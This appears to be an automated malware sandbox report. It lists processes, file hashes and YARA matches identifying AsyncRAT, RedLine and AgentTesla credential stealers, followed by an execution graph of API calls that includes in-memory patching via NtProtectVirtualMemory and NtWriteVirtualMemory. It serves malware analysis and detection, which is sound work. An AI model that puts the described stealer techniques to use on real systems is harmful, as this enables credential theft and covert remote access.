                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 4%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:5
                                                                                                  Start time:14:33:05
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\Public\Libraries\Akaelkov.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Akaelkov.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'743'360 bytes
                                                                                                  MD5 hash:344C9C0F72C535E334A4B605212C69D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 26%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:14:33:08
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:14:33:13
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\Public\Libraries\Akaelkov.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Akaelkov.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'743'360 bytes
                                                                                                  MD5 hash:344C9C0F72C535E334A4B605212C69D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:14:33:16
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:7.2%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:10.2%
                                                                                                    Total number of Nodes:606
                                                                                                    Total number of Limit Nodes:42
                                                                                                    execution_graph 55068 41618a7 55899 4104a98 55068->55899 55070 41618bf 55914 411fd38 55070->55914 55900 4104a9c 55899->55900 55901 4104afd 55899->55901 55902 4104aa4 55900->55902 55903 41047dc 55900->55903 55902->55901 55905 4104ab3 55902->55905 55947 41047dc 55902->55947 55909 41047f0 55903->55909 55935 410484c 55903->55935 55904 410481e 55904->55070 55907 410484c 11 API calls 55905->55907 55911 4104acd 55907->55911 55909->55904 55940 4102cc8 55909->55940 55912 41047dc 11 API calls 55911->55912 55913 4104af9 55912->55913 55913->55070 55915 411fd4c 55914->55915 55916 411fd6f LoadLibraryExA 55915->55916 55965 4104c4c 55916->55965 55919 4104c4c 55920 411fd90 GetProcAddress GetCurrentProcess NtProtectVirtualMemory 55919->55920 55967 411fd2c 55920->55967 55922 411fdd2 GetCurrentProcess NtWriteVirtualMemory FreeLibrary 55923 411fe06 55922->55923 55968 41047ac 55923->55968 55926 4104b0c 55927 4104b1d 55926->55927 55928 4104b43 55927->55928 55929 4104b5a 55927->55929 55972 4104ed4 55928->55972 55931 410484c 11 API calls 55929->55931 55933 4104b50 55931->55933 55932 4104b8b 55933->55932 55934 41047dc 11 API calls 55933->55934 55934->55932 55936 4104850 55935->55936 55937 4104874 55935->55937 55953 4102cac 55936->55953 55937->55909 55939 410485d 55939->55909 55941 4102cd6 55940->55941 55942 4102ccc 55940->55942 55941->55904 55942->55941 55943 4102dd5 55942->55943 55963 410686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55942->55963 55964 4102da4 7 API calls 55943->55964 55946 4102df6 55946->55904 55948 41047e0 55947->55948 55950 41047f0 55947->55950 55948->55950 55951 410484c 11 API calls 55948->55951 55949 410481e 55949->55905 55950->55949 55952 4102cc8 11 API calls 55950->55952 55951->55950 55952->55949 55954 4102cc3 55953->55954 55956 4102cb0 55953->55956 55954->55939 55955 4102cba 55955->55939 55956->55955 55957 4102dd5 55956->55957 55961 410686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55956->55961 55962 4102da4 7 API calls 55957->55962 55960 4102df6 55960->55939 55961->55957 55962->55960 55963->55943 55964->55946 55966 4104c50 GetModuleHandleA 55965->55966 55966->55919 55967->55922 55969 41047b2 55968->55969 55970 41047d8 55969->55970 55971 4102cc8 11 API calls 55969->55971 55970->55926 55971->55969 55973 4104ee1 55972->55973 55980 4104f11 55972->55980 55975 4104f0a 55973->55975 55978 4104eed 55973->55978 55976 410484c 11 API calls 55975->55976 55976->55980 55977 4104efb 55977->55933 55981 4102ce0 11 API calls 55978->55981 55982 4104788 55980->55982 55981->55977 55983 41047a9 55982->55983 55984 410478e 55982->55984 55983->55977 55984->55983 55985 4102cc8 11 API calls 55984->55985 55985->55983 55986 4168704 55989 415ca40 55986->55989 55990 415ca48 55989->55990 55990->55990 58267 4102f9c QueryPerformanceCounter 55990->58267 55992 415ca6a 58270 4102fc4 55992->58270 55994 415ca74 InetIsOffline 55995 415ca8f 55994->55995 55996 415ca7e 55994->55996 55998 41047dc 11 API calls 55995->55998 55997 41047dc 11 API calls 55996->55997 55999 415ca8d 55997->55999 56000 415ca9e 55998->56000 55999->56000 56001 4104b0c 11 API calls 56000->56001 56002 415cabc 56001->56002 56003 415cace 56002->56003 56004 4104a98 11 API calls 56003->56004 56005 415cae7 56004->56005 56006 415caef 56005->56006 56007 415caf9 56006->56007 56008 411fd38 19 API calls 56007->56008 56009 415cb02 56008->56009 56010 4104b0c 11 API calls 56009->56010 56011 415cb20 56010->56011 56012 4104c4c 56011->56012 56013 415cb28 56012->56013 58271 4104980 56013->58271 58268 4102fb4 GetTickCount 58267->58268 58269 4102fa9 58267->58269 58268->55992 58269->55992 58270->55994 58272 4104986 58271->58272 58272->58272 58273 4104fa4 58274 4104fa8 58273->58274 58275 4104fcb 58273->58275 58276 4104f68 58274->58276 58277 4104fbb SysReAllocStringLen 58274->58277 58278 4104f7c 58276->58278 58279 4104f6e SysFreeString 58276->58279 58277->58275 58280 4104f38 58277->58280 58279->58278 58281 4104f54 58280->58281 58282 4104f44 SysAllocStringLen 58280->58282 58282->58280 58282->58281 58283 41051e4 58284 41051f1 58283->58284 58288 41051f8 58283->58288 58292 4104f38 SysAllocStringLen 58284->58292 58289 4104f58 58288->58289 58290 4104f64 58289->58290 58291 4104f5e SysFreeString 58289->58291 58291->58290 58292->58288 58293 4169740 58303 41068b8 58293->58303 58297 416976e 58308 4168710 timeSetEvent 58297->58308 58299 4169778 58300 4169786 GetMessageA 58299->58300 58301 4169796 58300->58301 58302 416977a TranslateMessage DispatchMessageA 58300->58302 58302->58300 58304 41068c3 58303->58304 58309 4104444 58304->58309 58307 4104558 SysAllocStringLen SysFreeString SysReAllocStringLen 58307->58297 58308->58299 58310 410448a 58309->58310 58311 4104503 58310->58311 58312 4104694 58310->58312 58323 41043dc 58311->58323 58315 41046c5 58312->58315 58318 41046d6 58312->58318 58329 4104608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 58315->58329 58317 41046cf 58317->58318 58319 410471b FreeLibrary 58318->58319 58320 410473f 58318->58320 58319->58318 58321 4104748 58320->58321 58322 410474e ExitProcess 58320->58322 58321->58322 58324 41043ec 58323->58324 58325 410441f 58323->58325 58324->58325 58330 4101668 58324->58330 58334 41695f8 58324->58334 58348 4105b78 58324->58348 58325->58307 58329->58317 58352 41015fc 58330->58352 58332 4101670 VirtualAlloc 58333 4101687 58332->58333 58333->58324 58335 4169612 GetVersion 58334->58335 58336 4169670 58334->58336 58354 4147420 GetCurrentProcessId 58335->58354 58336->58324 58340 4169636 58386 4117200 44 API calls 58340->58386 58342 4169640 58387 41171ac 44 API calls 58342->58387 58344 4169650 58388 41171ac 44 API calls 58344->58388 58346 4169660 58389 41171ac 44 API calls 58346->58389 58349 4105ba4 58348->58349 58350 4105b88 GetModuleFileNameA 58348->58350 58349->58324 58550 4105ddc GetModuleFileNameA RegOpenKeyExA 58350->58550 58353 410159c 58352->58353 58353->58332 58390 41096ec 58354->58390 58357 41047dc 11 API calls 58358 4147469 58357->58358 58359 4147473 GlobalAddAtomA GetCurrentThreadId 58358->58359 58360 41096ec 42 API calls 58359->58360 58361 41474ad 58360->58361 58362 41047dc 11 API calls 58361->58362 58363 41474ba 58362->58363 58364 41474c4 GlobalAddAtomA 58363->58364 58365 4104c4c 58364->58365 58366 41474da RegisterWindowMessageA 58365->58366 58393 4117b44 58366->58393 58368 41474f1 58397 4147028 58368->58397 58370 41474fb 58405 4146dd4 58370->58405 58372 4147507 58409 4151538 58372->58409 58374 414751a 58426 4152740 58374->58426 58376 4147530 58443 41172ec 44 API calls 58376->58443 58378 414755a GetModuleHandleA 58379 414757a 58378->58379 58380 414756a GetProcAddress 58378->58380 58381 4104788 11 API calls 58379->58381 58380->58379 58382 414758f 58381->58382 58383 4104788 11 API calls 58382->58383 58384 4147597 58383->58384 58385 4117160 44 API calls 58384->58385 58385->58340 58386->58342 58387->58344 58388->58346 58389->58336 58444 4109700 58390->58444 58394 4117b4a 58393->58394 58395 4117b5f InitializeCriticalSection 58394->58395 58396 4117b74 58395->58396 58396->58368 58398 4147195 58397->58398 58399 414703c SetErrorMode 58397->58399 58398->58370 58400 4147060 GetModuleHandleA GetProcAddress 58399->58400 58401 414707c 58399->58401 58400->58401 58402 4147177 SetErrorMode 58401->58402 58403 4147089 LoadLibraryA 58401->58403 58402->58370 58403->58402 58404 41470a5 10 API calls 58403->58404 58404->58402 58406 4146dda 58405->58406 58464 4146fc4 58406->58464 58408 4146e48 58408->58372 58410 4151542 58409->58410 58477 411d8bc 58410->58477 58412 4151558 58481 41518f4 LoadCursorA 58412->58481 58415 4151591 58416 41515cd GetDC GetDeviceCaps ReleaseDC 58415->58416 58417 4151603 58416->58417 58486 4121fe4 58417->58486 58419 415160f 58420 4121fe4 13 API calls 58419->58420 58421 4151621 58420->58421 58422 4121fe4 13 API calls 58421->58422 58423 4151633 58422->58423 58490 4151d24 58423->58490 58425 4151640 58425->58374 58427 415274f 58426->58427 58428 411d8bc 42 API calls 58427->58428 58429 4152765 58428->58429 58430 4152822 LoadIconA 58429->58430 58528 4127524 58430->58528 58432 4152845 GetModuleFileNameA OemToCharA 58433 415288e 58432->58433 58434 41528b4 CharNextA CharLowerA 58433->58434 58435 41528dc 58434->58435 58530 411ea38 GetClassInfoA 58435->58530 58438 4152905 58541 4154b14 11 API calls 58438->58541 58439 41528fe 58540 4152a94 60 API calls 58439->58540 58442 4152927 58442->58376 58443->58378 58445 4109726 58444->58445 58448 4109759 58445->58448 58457 41092f4 42 API calls 58445->58457 58447 41097c3 58459 4104878 58447->58459 58448->58447 58456 4109776 58448->58456 58450 41096fb 58450->58357 58451 41097b7 58453 4104ed4 11 API calls 58451->58453 58452 4104788 11 API calls 58452->58456 58453->58450 58454 4104ed4 11 API calls 58454->58456 58456->58451 58456->58452 58456->58454 58458 41092f4 42 API calls 58456->58458 58457->58448 58458->58456 58460 410484c 11 API calls 58459->58460 58461 4104888 58460->58461 58462 4104788 11 API calls 58461->58462 58463 41048a0 58462->58463 58463->58450 58465 4146fd3 58464->58465 58466 4146fcc 58464->58466 58467 4146fe0 58465->58467 58468 4146fe9 58465->58468 58469 4146ffe SystemParametersInfoA 58466->58469 58470 414700f SendMessageA 58466->58470 58473 4146fd1 58466->58473 58475 4146f54 6 API calls 58467->58475 58476 4146f24 SystemParametersInfoA 58468->58476 58469->58473 58470->58473 58473->58408 58474 4146ff0 58474->58408 58475->58473 58476->58474 58478 411d8c3 58477->58478 58479 411d8e8 58478->58479 58508 411da78 42 API calls 58478->58508 58479->58412 58482 4151913 58481->58482 58483 415192c LoadCursorA 58482->58483 58485 415157b GetKeyboardLayout 58482->58485 58509 41519b0 58483->58509 58485->58415 58487 4121fea 58486->58487 58512 41214f0 58487->58512 58489 412200c 58489->58419 58492 4151d3d 58490->58492 58491 4151d6f SystemParametersInfoA 58493 4151d82 CreateFontIndirectA 58491->58493 58494 4151d9a GetStockObject 58491->58494 58492->58491 58522 4122434 16 API calls 58493->58522 58523 4122434 16 API calls 58494->58523 58497 4151dae SystemParametersInfoA 58499 4151e02 58497->58499 58500 4151dce CreateFontIndirectA 58497->58500 58498 4151d98 58498->58497 58526 4122518 16 API calls 58499->58526 58524 4122434 16 API calls 58500->58524 58503 4151de7 CreateFontIndirectA 58525 4122434 16 API calls 58503->58525 58504 4151e12 GetStockObject 